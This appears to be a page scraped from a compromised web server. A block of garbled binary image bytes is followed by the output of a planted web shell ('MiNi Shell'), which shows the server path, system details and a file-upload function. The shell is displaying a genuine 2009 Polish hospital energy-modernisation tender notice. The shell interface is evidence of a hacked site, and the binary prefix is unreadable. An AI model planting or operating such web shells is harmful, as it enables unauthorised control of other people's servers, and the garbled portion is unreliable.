JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/112710-N-2009.html

<p class="kh_header"><b>Busko-Zdrój: Modernizacja systemu energetycznego 21 WSzU-R SP ZOZ w Busku - Zdroju</b><br>
<b>Numer ogłoszenia: 112710 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 21 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ , ul. Gen. F. Rzewuskiego 8, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3780919, 3780348, faks 041 3780332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.21wszur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja systemu energetycznego 21 WSzU-R SP ZOZ w Busku - Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A)	Przedmiotem zamówienia jest wykonanie modernizacji gospodarki cieplnej i energetycznej dla 21 Wojskowego Szpitala Uzdrowiskowo- Rehabilitacyjnego w zakresie:
1. przebudowy i rozbudowy istniejącego budynku stacji trafo dla potrzeb nowej
2. kotłowni wraz z montażem kotłów, wymienników, niezbędnej instalacji
3. dostawy i montażu agregatu prądotwórczego
4. budowy sieci ciepłowniczych, c.w.u,. łączących budynek kotłowni z istniejącymi budynkami
5. budowy gazociągu łączącego gazociąg na terenie szpitala z budynkiem projektowanej kotłowni
6.budowy sieci elektrycznych łączących budynek kotłowni z istniejącymi budynkami
7.budowy systemu monitoringu i wizualizacji zintegrowanego systemu energetycznego
8.budowy instalacji odzysku ciepła z wód pokąpielowych siarczkowych i c.w.u. wraz z  częściową  przebudową kanalizacji zewnętrznej
9.przebudowy węzłów cieplnych w poszczególnych budynkach szpitala 
10. odzysku ciepła z  central wentylacyjnych kuchni szpitala
11. montażu kolektorów słonecznych na bud. nr 19 i 22
12. rozruchu przebudowanego systemu energetycznego szpitala 
13. szkolenia obsługi
14. opracowania instrukcji obsługi i eksploatacji wykonanego systemu energetycznego w tym monitoringu i wizualizacji.
B)	Wykonawca musi przedstawić ofertę obejmującą całość zamówienia, gdyż zamówienie nie zostanie podzielone na wyodrębnione części i musi być zrealizowane jednoetapowo w całości. 
C)	Zamawiający przedstawia poniżej obowiązujący Wykonawcę harmonogram realizacji inwestycji modernizacji cieplnej i energetycznej 21 WSzUR w Busku Zdroju w podziale robót na lata 2009 - 2010..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.11.12.00-0, 45.26.23.00-4, 45.41.00.00-4, 45.43.00.00-0, 45.42.00.00-7, 45.33.20.00-3, 09.13.51.00-5, 44.62.21.22-0, 09.33.11.00-9, 45.23.21.50-8, 45.23.24.40-8, 45.31.56.00-4, 45.31.53.00-1, 45.31.56.00-4, 45.31.57.00-5, 45.31.60.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wysokość wadium.
1.	Oferent przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości:  100 000,00 zł. (słownie: sto tysięcy złotych) 
2. Forma wadium
      Wadium może być wniesione w:
.	pieniądzu,
.	poręczeniach bankowych,
.	gwarancjach bankowych,
.	gwarancjach ubezpieczeniowych,
3.	Termin i miejsce wniesienia wadium
W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na konto Zamawiającego w: Bank BPH OBusko - Zdrój  68-10600076-0000320001263294
Za skutecznie wniesione wadium w pieniądzu uważa się wadium znajdujące się (zaksięgowane) w dniu 11 maja 2009 r. do godz. 10.30 na rachunku Zamawiającego.
Kserokopię dowodu wpłaty (polecenie przelewu) należy dołączyć do oferty.
W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w roz. VIII pkt 2 SIWZ oryginał należy złożyć w kasie Zamawiającego przed ustalonym terminem otwarcia ofert, kopię poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
UWAGA! Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania ofertą. Oferta zabezpieczona na okres krótszy niż wymagany zostanie odrzucona.
Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem oferenta z postępowania.
Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 ust. 5 ustawy, a mianowicie: - 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
4. Zwrot wadium
Zamawiający niezwłocznie zwróci wadium, gdy:
-	upłynął termin związania ofertą,
-	zawarto umowę i wniesiono zabezpieczenie należytego wykonania umowy,
-	unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich składania,
Zamawiający zwróci niezwłocznie wadium na pisemne zgłoszenie wniosku przez Oferenta:
a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania,
c) którego oferta została odrzucona.
Złożenie przez Oferenta, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Oferenta.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:.
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniósł zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
a.	Spełniają warunki określone w art. 22 ust. 1 Ustawy Prawo zamówień publicznych.
b.	Nie są wykluczeni na podstawie art. 24 Ustawy Prawo zamówień publicznych.
c.	Przedstawią ofertę zgodną z wymogami Ustawy Prawo zamówień publicznych i warunkami SIWZ. 
d.	Udokumentują, iż w okresie ostatnich 5- lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy z tego okresu, należycie i rzetelnie wykonali co najmniej 3 zamówienia obejmujące roboty budowlano - instalacyjne wraz z wykonaniem i uruchomieniem przynajmniej jednej kotłowni o mocy nie mniej niż 500 kW, podając  nazwę i adres Inwestora. Wartość zrealizowanego minimum jednego zamówienia winna wynosić nie mniej  niż  brutto 4 000 000, 00 zł PLN (słownie : cztery mil. zł. PLN), przy czym zamówienie to nie musi zawierać budowy kotłowni o mocy 500 kW.
e.	Zapewnią nadzór nad robotami przez wykwalifikowany personel. Zamawiający wymaga,  aby kierownik,cy budowy(robót) posiadał,li uprawnienia budowlane do kierowania robotami w specjalności: 
- konstrukcyjno-budowlanej,
- instalacyjnej w zakresie instalacji i sieci gazowej, wodociągowo-kanalizacyjnej, centralnego ogrzewania (cieplnych), wentylacyjnych; 
- instalacji i urządzeń elektrycznych i elektroenergetycznych; i
Wymaga się aby ww osoby przedstawiły aktualne zaświadczenie przynależności do Okręgowej Izby Samorządu Zawodowego.
f.	udzielą gwarancji na wykonany przedmiot umowy na okres 60 miesięcy, licząc od dnia ukończenia robót wymienionych w Protokole Odbioru Końcowego. Ponadto okres rękojmi za wady fizyczne przedmiotu umowy wygasają po upływie 6 m-cy od daty zakończenia okresu gwarancji.
g.	Udzieli gwarancji na urządzenia na okres 36 miesięcy, licząc od dnia ukończenia robót wymienionych w Protokole Odbioru Końcowego.
h.	Posiadają polisę lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 1 000 000,00 zł. PLN (słownie: jeden milion złotych).
2.	W przypadku gdy o udzielenie zamówienia ubiega się konsorcjum, wówczas wymaga się , aby każdy z jego członków nie podlegał wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Ustawy, a członkowie łącznie spełniali warunki określone w rozdz.VI.  pkt. 1. 
3.	Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów. Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na potwierdzenie spełniania warunków udziału w postępowaniu określonych w rozdz.VI niniejszej specyfikacji Wykonawcy muszą przedstawić następujące dokumenty:
a)	 Wypełniony i podpisany formularz ofertowy, załącznik nr 1 do niniejszej SIWZ. 
b)	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ustawy,  załącznik nr 2,  do niniejszej SIWZ,
c)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działalności wykonawcy odpowiada przedmiotowi zamówienia, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)	Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. l pkt 4-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert.
e)	Aktualną informacja z Krajowego Rejestru Karnego określona w art. 24 ust. l pkt 9 ustawy wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert.
f)	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenie Społecznego, potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed terminem składania ofert.
f.	Wykaz co najmniej 3 robót budowlanych wykonanych i zakończonych w ciągu ostatnich pięciu lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, obejmujący roboty budowlane wraz z wykonaniem i uruchomieniem przynajmniej jednej kotłowni o mocy nie mniej niż 500 kW, z podaniem ich wartości, daty wykonania i odbiorów wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - wg wzoru stanowiącego załącznik Nr 3, do SIWZ. Wartość zrealizowanego minimum jednego zamówienia winna wynosić nie mniej niż brutto 4 000 000, 00 zł PLN (słownie : cztery mil. zł. PLN), przy czym zamówienie to nie musi zawierać budowy kotłowni o mocy 500 kW.
g)	 Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji z załączonymi uprawnieniami kierownika,ków  budowy w specjalności: konstrukcyjno -budowlanej; instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych , wodociągowych, kanalizacyjnych, gazowych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych; i aktualnym,i  zaświadczeniem,niami o przynależności do Okręgowej Izby Samorządu Zawodowego w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r o Samorządach zawodowych architektów, inżynierów oraz urbanistów (Dz.U. z 2001 r, Nr 5, poz.42 ze zm.) - wg wzoru stanowiącego załącznik Nr 4, do niniejszej SIWZ.
h)	Polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 1 000 000,00 zł.( słownie: jeden milion  złotych).
i)	Wykaz robót, które będą wykonywane przez podwykonawców - według załącznika nr 5, do niniejszej SIWZ.
j)	Informację banku prowadzącego rachunek bankowy Wykonawcy, w której potwierdza się posiadanie środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż 2 000 000,00 zł. PLN (słownie: dwa miliony zł.), wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
k)	Dokumenty, o których mowa w rozdziale VII pkt 1 niniejszej specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę,y uprawnioną,e do reprezentacji Wykonawcy.
2.	W przypadku konsorcjum dokumenty wymienione w rozdziale VII pkt 1 p.pkt a, b, c, d, e, h niniejszej specyfikacji przedstawia każdy z członków konsorcjum. Pozostałe dokumenty mogą być przedstawione przez jednego Wykonawcę lub wspólnie.
3.	W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie niniejszego zamówienia publicznego.
4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale VII, pkt 1, p.pkt b niniejszej specyfikacji składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
5.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
6.	Dokumenty Wykonawca składa w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski przez tłumacza przysięgłego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://21wszur.tbu.pl/bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 21 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ ul. Rzewuskiego 8, 28 - 100 Busko Zdrój, strona internetowa http://21wszur.tbu.pl/bip/.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 10:30, miejsce: 21 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ ul. Rzewuskiego 8, 28 - 100 Busko Zdrój, sekretariat szpitala p. 52 bud KORAL.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com